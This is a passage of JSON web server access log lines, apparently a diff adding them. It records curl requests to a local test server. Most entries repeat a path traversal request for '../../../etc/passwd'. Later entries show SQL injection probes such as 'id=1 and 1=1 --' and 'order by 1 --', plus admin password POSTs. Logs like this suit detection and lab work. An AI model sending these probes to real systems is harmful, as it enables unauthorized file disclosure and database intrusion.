HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.025","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:09:02:55 +0000","request_body":"-","remote_addr":"192.168.16.1","http_host":"127.0.0.1","request":"GET /index.php?id=../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.023","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:09:02:55 +0000","request_body":"-","remote_addr":"192.168.16.1","http_host":"127.0.0.1","request":"GET /index.php?id=../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.033","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:09:02:55 +0000","request_body":"-","remote_addr":"192.168.16.1","http_host":"127.0.0.1","request":"GET /index.php?id=../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.024","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:09:02:55 +0000","request_body":"-","remote_addr":"192.168.16.1","http_host":"127.0.0.1","request":"GET /index.php?id=../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.025","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:09:02:56 +0000","request_body":"-","remote_addr":"192.168.16.1","http_host":"127.0.0.1","request":"GET /index.php?id=../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.028","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:09:02:56 +0000","request_body":"-","remote_addr":"192.168.16.1","http_host":"127.0.0.1","request":"GET /index.php?id=../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.022","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:09:02:56 +0000","request_body":"-","remote_addr":"192.168.16.1","http_host":"127.0.0.1","request":"GET /index.php?id=../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.023","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:09:02:56 +0000","request_body":"-","remote_addr":"192.168.16.1","http_host":"127.0.0.1","request":"GET /index.php?id=../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.024","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:09:02:57 +0000","request_body":"-","remote_addr":"192.168.16.1","http_host":"127.0.0.1","request":"GET /index.php?id=../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.025","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:09:02:57 +0000","request_body":"-","remote_addr":"192.168.16.1","http_host":"127.0.0.1","request":"GET /index.php?id=../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.024","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:09:02:57 +0000","request_body":"-","remote_addr":"192.168.16.1","http_host":"127.0.0.1","request":"GET /index.php?id=../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.022","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:09:02:57 +0000","request_body":"-","remote_addr":"192.168.16.1","http_host":"127.0.0.1","request":"GET /index.php?id=../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.021","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:09:02:57 +0000","request_body":"-","remote_addr":"192.168.16.1","http_host":"127.0.0.1","request":"GET /index.php?id=../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.022","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:09:02:57 +0000","request_body":"-","remote_addr":"192.168.16.1","http_host":"127.0.0.1","request":"GET /index.php?id=../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.020","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:09:02:58 +0000","request_body":"-","remote_addr":"192.168.16.1","http_host":"127.0.0.1","request":"GET /index.php?id=../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.021","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:09:02:58 +0000","request_body":"-","remote_addr":"192.168.16.1","http_host":"127.0.0.1","request":"GET /index.php?id=../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.022","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:09:02:58 +0000","request_body":"-","remote_addr":"192.168.16.1","http_host":"127.0.0.1","request":"GET /index.php?id=../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.062","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:09:02:58 +0000","request_body":"-","remote_addr":"192.168.16.1","http_host":"127.0.0.1","request":"GET /index.php?id=../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.057","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:09:02:58 +0000","request_body":"-","remote_addr":"192.168.16.1","http_host":"127.0.0.1","request":"GET /index.php?id=../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.023","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:09:02:59 +0000","request_body":"-","remote_addr":"192.168.16.1","http_host":"127.0.0.1","request":"GET /index.php?id=../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.128","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:09:02:59 +0000","request_body":"-","remote_addr":"192.168.16.1","http_host":"127.0.0.1","request":"GET /index.php?id=../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.342","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:09:02:59 +0000","request_body":"-","remote_addr":"192.168.16.1","http_host":"127.0.0.1","request":"GET /index.php?id=../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.259","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:09:02:59 +0000","request_body":"-","remote_addr":"192.168.16.1","http_host":"127.0.0.1","request":"GET /index.php?id=../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.160","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:09:03:00 +0000","request_body":"-","remote_addr":"192.168.16.1","http_host":"127.0.0.1","request":"GET /index.php?id=../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.022","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:09:03:00 +0000","request_body":"-","remote_addr":"192.168.16.1","http_host":"127.0.0.1","request":"GET /index.php?id=../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.030","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:09:03:00 +0000","request_body":"-","remote_addr":"192.168.16.1","http_host":"127.0.0.1","request":"GET /index.php?id=../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.026","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:09:03:01 +0000","request_body":"-","remote_addr":"192.168.16.1","http_host":"127.0.0.1","request":"GET /index.php?id=../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.025","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:09:03:01 +0000","request_body":"-","remote_addr":"192.168.16.1","http_host":"127.0.0.1","request":"GET /index.php?id=../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.024","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:09:03:01 +0000","request_body":"-","remote_addr":"192.168.16.1","http_host":"127.0.0.1","request":"GET /index.php?id=../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.025","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:09:03:01 +0000","request_body":"-","remote_addr":"192.168.16.1","http_host":"127.0.0.1","request":"GET /index.php?id=../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.022","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:09:03:01 +0000","request_body":"-","remote_addr":"192.168.16.1","http_host":"127.0.0.1","request":"GET /index.php?id=../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.023","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:10:36:57 +0000","request_body":"-","remote_addr":"192.168.16.1","http_host":"127.0.0.1","request":"GET /index.php?id=1 and 1=1 HTTP/1.1","status":"400","body_bytes_sents":"157","req_time":"0.027","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:11:02:04 +0000","request_body":"-","remote_addr":"192.168.32.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.027","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:11:02:34 +0000","request_body":"passwd=admin","remote_addr":"192.168.32.1","http_host":"127.0.0.1","request":"POST /index.php HTTP/1.1","status":"405","body_bytes_sents":"157","req_time":"0.034","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:11:02:42 +0000","request_body":"passwd=admin","remote_addr":"192.168.32.1","http_host":"127.0.0.1","request":"POST /index.php HTTP/1.1","status":"405","body_bytes_sents":"157","req_time":"0.023","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:11:45:03 +0000","request_body":"-","remote_addr":"192.168.48.1","http_host":"127.0.0.1","request":"GET /index.php?id=1 order by 1 -- HTTP/1.1","status":"400","body_bytes_sents":"157","req_time":"0.029","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:11:45:06 +0000","request_body":"-","remote_addr":"192.168.48.1","http_host":"127.0.0.1","request":"GET /index.php?id=1 order by 1 -- HTTP/1.1","status":"400","body_bytes_sents":"157","req_time":"0.027","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:11:48:14 +0000","request_body":"-","remote_addr":"192.168.48.1","http_host":"127.0.0.1","request":"GET /index.php?id=1 and 1=1 -- HTTP/1.1","status":"400","body_bytes_sents":"157","req_time":"0.023","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:11:48:17 +0000","request_body":"-","remote_addr":"192.168.48.1","http_host":"127.0.0.1","request":"GET /index.php?id=1 and 1=1 -- HTTP/1.1","status":"400","body_bytes_sents":"157","req_time":"0.029","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:12:06:19 +0000","request_body":"-","remote_addr":"192.168.48.1","http_host":"127.0.0.1","request":"GET /index.php?id=1 and 1=1 -- HTTP/1.1","status":"400","body_bytes_sents":"157","req_time":"0.034","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:12:06:22 +0000","request_body":"-","remote_addr":"192.168.48.1","http_host":"127.0.0.1","request":"GET /index.php?id=1 and 1=1 -- HTTP/1.1","status":"400","body_bytes_sents":"157","req_time":"0.048","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:12:06:22 +0000","request_body":"-","remote_addr":"192.168.48.1","http_host":"127.0.0.1","request":"GET /index.php?id=1 and 1=1 -- HTTP/1.1","status":"400","body_bytes_sents":"157","req_time":"0.031","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:12:06:23 +0000","request_body":"-","remote_addr":"192.168.48.1","http_host":"127.0.0.1","request":"GET /index.php?id=1 and 1=1 -- HTTP/1.1","status":"400","body_bytes_sents":"157","req_time":"0.032","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:12:06:24 +0000","request_body":"-","remote_addr":"192.168.48.1","http_host":"127.0.0.1","request":"GET /index.php?id=1 and 1=1 -- HTTP/1.1","status":"400","body_bytes_sents":"157","req_time":"0.031","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:12:10:26 +0000","request_body":"-","remote_addr":"192.168.48.1","http_host":"127.0.0.1","request":"GET /index.php?id=1 and 1=1 -- HTTP/1.1","status":"400","body_bytes_sents":"157","req_time":"0.031","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:12:10:27 +0000","request_body":"-","remote_addr":"192.168.48.1","http_host":"127.0.0.1","request":"GET /index.php?id=1 and 1=1 -- HTTP/1.1","status":"400","body_bytes_sents":"157","req_time":"0.021","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:12:10:28 +0000","request_body":"-","remote_addr":"192.168.48.1","http_host":"127.0.0.1","request":"GET /index.php?id=1 and 1=1 -- HTTP/1.1","status":"400","body_bytes_sents":"157","req_time":"0.023","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:12:10:29 +0000","request_body":"-","remote_addr":"192.168.48.1","http_host":"127.0.0.1","request":"GET /index.php?id=1 and 1=1 -- HTTP/1.1","status":"400","body_bytes_sents":"157","req_time":"0.030","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:12:10:29 +0000","request_body":"-","remote_addr":"192.168.48.1","http_host":"127.0.0.1","request":"GET /index.php?id=1 and 1=1 -- HTTP/1.1","status":"400","body_bytes_sents":"157","req_time":"0.022","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:12:10:30 +0000","request_body":"-","remote_addr":"192.168.48.1","http_host":"127.0.0.1","request":"GET /index.php?id=1 and 1=1 -- HTTP/1.1","status":"400","body_bytes_sents":"157","req_time":"0.026","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:12:10:30 +0000","request_body":"-","remote_addr":"192.168.48.1","http_host":"127.0.0.1","request":"GET /index.php?id=1 and 1=1 -- HTTP/1.1","status":"400","body_bytes_sents":"157","req_time":"0.029","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:12:10:31 +0000","request_body":"-","remote_addr":"192.168.48.1","http_host":"127.0.0.1","request":"GET /index.php?id=1 and 1=1 -- HTTP/1.1","status":"400","body_bytes_sents":"157","req_time":"0.029","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:12:16:44 +0000","request_body":"-","remote_addr":"192.168.80.1","http_host":"127.0.0.1","request":"GET /index.php?id=1 and 1=1 -- HTTP/1.1","status":"400","body_bytes_sents":"157","req_time":"0.025","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:12:20:51 +0000","request_body":"-","remote_addr":"192.168.96.1","http_host":"127.0.0.1","request":"GET /index.php?id=1 and 1=1 -- HTTP/1.1","status":"400","body_bytes_sents":"157","req_time":"0.031","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:12:20:53 +0000","request_body":"-","remote_addr":"192.168.96.1","http_host":"127.0.0.1","request":"GET /index.php?id=1 and 1=1 -- HTTP/1.1","status":"400","body_bytes_sents":"157","req_time":"0.022","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:12:20:53 +0000","request_body":"-","remote_addr":"192.168.96.1","http_host":"127.0.0.1","request":"GET /index.php?id=1 and 1=1 -- HTTP/1.1","status":"400","body_bytes_sents":"157","req_time":"0.030","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:12:20:54 +0000","request_body":"-","remote_addr":"192.168.96.1","http_host":"127.0.0.1","request":"GET /index.php?id=1 and 1=1 -- HTTP/1.1","status":"400","body_bytes_sents":"157","req_time":"0.032","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:12:20:54 +0000","request_body":"-","remote_addr":"192.168.96.1","http_host":"127.0.0.1","request":"GET /index.php?id=1 and 1=1 -- HTTP/1.1","status":"400","body_bytes_sents":"157","req_time":"0.024","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:12:20:55 +0000","request_body":"-","remote_addr":"192.168.96.1","http_host":"127.0.0.1","request":"GET /index.php?id=1 and 1=1 -- HTTP/1.1","status":"400","body_bytes_sents":"157","req_time":"0.026","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:12:20:56 +0000","request_body":"-","remote_addr":"192.168.96.1","http_host":"127.0.0.1","request":"GET /index.php?id=1 and 1=1 -- HTTP/1.1","status":"400","body_bytes_sents":"157","req_time":"0.030","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:12:20:56 +0000","request_body":"-","remote_addr":"192.168.96.1","http_host":"127.0.0.1","request":"GET /index.php?id=1 and 1=1 -- HTTP/1.1","status":"400","body_bytes_sents":"157","req_time":"0.029","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:12:20:57 +0000","request_body":"-","remote_addr":"192.168.96.1","http_host":"127.0.0.1","request":"GET /index.php?id=1 and 1=1 -- HTTP/1.1","status":"400","body_bytes_sents":"157","req_time":"0.024","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:12:20:57 +0000","request_body":"-","remote_addr":"192.168.96.1","http_host":"127.0.0.1","request":"GET /index.php?id=1 and 1=1 -- HTTP/1.1","status":"400","body_bytes_sents":"157","req_time":"0.033","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:12:20:58 +0000","request_body":"-","remote_addr":"192.168.96.1","http_host":"127.0.0.1","request":"GET /index.php?id=1 and 1=1 -- HTTP/1.1","status":"400","body_bytes_sents":"157","req_time":"0.026","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:12:20:58 +0000","request_body":"-","remote_addr":"192.168.96.1","http_host":"127.0.0.1","request":"GET /index.php?id=1 and 1=1 -- HTTP/1.1","status":"400","body_bytes_sents":"157","req_time":"0.034","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:12:21:01 +0000","request_body":"-","remote_addr":"192.168.96.1","http_host":"127.0.0.1","request":"GET /index.php?id=1 and 1=1 -- HTTP/1.1","status":"400","body_bytes_sents":"157","req_time":"0.022","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:12:22:28 +0000","request_body":"-","remote_addr":"192.168.96.1","http_host":"127.0.0.1","request":"GET /index.php?id=1 and 1=1 -- HTTP/1.1","status":"400","body_bytes_sents":"157","req_time":"0.238","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:12:22:34 +0000","request_body":"-","remote_addr":"192.168.96.1","http_host":"127.0.0.1","request":"GET /index.php?id=1 and 1=1 -- HTTP/1.1","status":"400","body_bytes_sents":"157","req_time":"0.027","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:12:22:36 +0000","request_body":"-","remote_addr":"192.168.96.1","http_host":"127.0.0.1","request":"GET /index.php?id=1 and 1=1 -- HTTP/1.1","status":"400","body_bytes_sents":"157","req_time":"0.020","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:12:22:36 +0000","request_body":"-","remote_addr":"192.168.96.1","http_host":"127.0.0.1","request":"GET /index.php?id=1 and 1=1 -- HTTP/1.1","status":"400","body_bytes_sents":"157","req_time":"0.041","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:12:22:37 +0000","request_body":"-","remote_addr":"192.168.96.1","http_host":"127.0.0.1","request":"GET /index.php?id=1 and 1=1 -- HTTP/1.1","status":"400","body_bytes_sents":"157","req_time":"0.030","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:12:22:38 +0000","request_body":"-","remote_addr":"192.168.96.1","http_host":"127.0.0.1","request":"GET /index.php?id=1 and 1=1 -- HTTP/1.1","status":"400","body_bytes_sents":"157","req_time":"0.033","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:12:23:20 +0000","request_body":"-","remote_addr":"192.168.96.1","http_host":"127.0.0.1","request":"GET /index.php?id=1 and 1=1 -- HTTP/1.1","status":"400","body_bytes_sents":"157","req_time":"0.039","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:12:52:59 +0000","request_body":"-","remote_addr":"192.168.112.1","http_host":"127.0.0.1","request":"GET /index.php?id=1 and 1=1 -- HTTP/1.1","status":"400","body_bytes_sents":"157","req_time":"0.023","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:12:58:57 +0000","request_body":"-","remote_addr":"192.168.128.1","http_host":"127.0.0.1","request":"GET /index.php?id=1 and 1=1 -- HTTP/1.1","status":"400","body_bytes_sents":"157","req_time":"0.042","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:12:58:59 +0000","request_body":"-","remote_addr":"192.168.128.1","http_host":"127.0.0.1","request":"GET /index.php?id=1 and 1=1 -- HTTP/1.1","status":"400","body_bytes_sents":"157","req_time":"0.024","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:12:59:01 +0000","request_body":"-","remote_addr":"192.168.128.1","http_host":"127.0.0.1","request":"GET /index.php?id=1 and 1=1 -- HTTP/1.1","status":"400","body_bytes_sents":"157","req_time":"0.027","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:12:59:02 +0000","request_body":"-","remote_addr":"192.168.128.1","http_host":"127.0.0.1","request":"GET /index.php?id=1 and 1=1 -- HTTP/1.1","status":"400","body_bytes_sents":"157","req_time":"0.019","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:12:59:03 +0000","request_body":"-","remote_addr":"192.168.128.1","http_host":"127.0.0.1","request":"GET /index.php?id=1 and 1=1 -- HTTP/1.1","status":"400","body_bytes_sents":"157","req_time":"0.054","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:12:59:04 +0000","request_body":"-","remote_addr":"192.168.128.1","http_host":"127.0.0.1","request":"GET /index.php?id=1 and 1=1 -- HTTP/1.1","status":"400","body_bytes_sents":"157","req_time":"0.098","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:13:02:59 +0000","request_body":"-","remote_addr":"192.168.128.1","http_host":"127.0.0.1","request":"GET /index.php?id=1 and 1=1 -- HTTP/1.1","status":"400","body_bytes_sents":"157","req_time":"0.025","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:13:03:08 +0000","request_body":"-","remote_addr":"192.168.128.1","http_host":"127.0.0.1","request":"GET /index.php?id=1 and 1=1 -- HTTP/1.1","status":"400","body_bytes_sents":"157","req_time":"0.153","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:13:03:08 +0000","request_body":"-","remote_addr":"192.168.128.1","http_host":"127.0.0.1","request":"GET /index.php?id=1 and 1=1 -- HTTP/1.1","status":"400","body_bytes_sents":"157","req_time":"0.052","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:13:03:09 +0000","request_body":"-","remote_addr":"192.168.128.1","http_host":"127.0.0.1","request":"GET /index.php?id=1 and 1=1 -- HTTP/1.1","status":"400","body_bytes_sents":"157","req_time":"0.023","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:13:03:09 +0000","request_body":"-","remote_addr":"192.168.128.1","http_host":"127.0.0.1","request":"GET /index.php?id=1 and 1=1 -- HTTP/1.1","status":"400","body_bytes_sents":"157","req_time":"0.032","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:13:03:10 +0000","request_body":"-","remote_addr":"192.168.128.1","http_host":"127.0.0.1","request":"GET /index.php?id=1 and 1=1 -- HTTP/1.1","status":"400","body_bytes_sents":"157","req_time":"0.034","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:13:03:10 +0000","request_body":"-","remote_addr":"192.168.128.1","http_host":"127.0.0.1","request":"GET /index.php?id=1 and 1=1 -- HTTP/1.1","status":"400","body_bytes_sents":"157","req_time":"0.030","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:13:14:15 +0000","request_body":"-","remote_addr":"192.168.128.1","http_host":"127.0.0.1","request":"GET /index.php?id=1 and 1=1 -- HTTP/1.1","status":"400","body_bytes_sents":"157","req_time":"0.031","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", 